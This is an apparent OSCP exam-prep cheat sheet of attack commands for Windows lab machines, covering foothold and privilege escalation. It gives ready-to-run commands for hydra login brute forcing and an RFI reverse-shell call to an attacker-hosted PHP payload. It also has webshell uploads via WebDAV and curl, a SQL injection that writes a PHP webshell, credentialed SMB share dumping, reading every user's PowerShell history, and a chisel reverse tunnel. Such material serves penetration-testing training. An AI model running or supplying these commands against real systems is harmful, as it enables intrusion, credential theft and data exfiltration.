Windows

Based on the following PG Practice and PEN-200 boxes: Algernon, AuthBy, Billyboss, Craft, DVR4, Fish, Hepet, Internal, Jacko, Kevin, MedJed, Mice, Monster, Nickel, Slort, Squid, Shenzi, Hermes (OSCP A), Gust (OSCP B), Pascha (OSCP C).

Foothold

Port Scan

The nmap-scan script can be found here.

sudo nmap-scan <target-IP>
HTTP(S)
# Dirbust with a directory list
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,

​# Dirbust with a file list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ
uv run creds search <appName>
# POST request
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER^&password=^PASS^:F=403'

# POST request (base64-encoded credentials)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER64^&password=^PASS64^:F=403'
# CLI tool
searchsploit <appName> <version>

# Google dork
site:github.com <appName> exploit poc

# RFI revshell
curl --path-as-is -s "http://10.10.10.10:4443/site/index.php?page=http://192.168.45.241:443/revshell_ivan.php" --proxy 127.0.0.1:8080
# Connect to WebDAV
cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!
# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/
# Enumeration
sqlmap -r login.req --batch

# Webshell
a' UNION SELECT "<?php echo shell_exec($_GET['c']); ?>" INTO OUTFILE 'C:/xampp/htdocs/webshell.php'--

# RCE
$ curl -s --path-as-is "http://192.168.180.127:45332/webshell.php?c=whoami"
SMB
sudo nmap -script=smb-vuln\* -p445 10.10.10.10
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999
FTP
# Anonymous login
ftp anonymous@target
ftp ftp@target
hydra -l <user> -P <passlist> ftp://<target>
# Download dir
wget -r ftp://ftp@target_directory
ftp> put revshell_ivan.php
SMTP, POP3
smtp-user-enum -M VRFY -U anarchy_output -t 10.10.10.10
$ telnet 10.10.10.10 110
USER x7331
+OK x7331 is known here.
PASS Pass123!
+OK Welcome! 4 messages (4744 bytes)
LIST
+OK 4 messages, 4744 bytes
1 1342
2 963
3 1347
4 1092
RETR 1
​Unique Ports

Privilege Escalation

User Context
whoami /priv
# History files of all host's users (assuming default path)
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Host Enumeration
systeminfo
# Start the chisel server on the attacking host
./chisel server -p 8000 --reverse

# Connect from the target host
.\chisel.exe client 192.168.45.157:8000 R:6033:127.0.0.1:3306

# Enumerate the forwarded port on the attacking host
mysql -h 127.0.0.1 -P 6033 -u root
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999
MSSQL
PreviousAD SetNextLinux

Last updated

Was this helpful?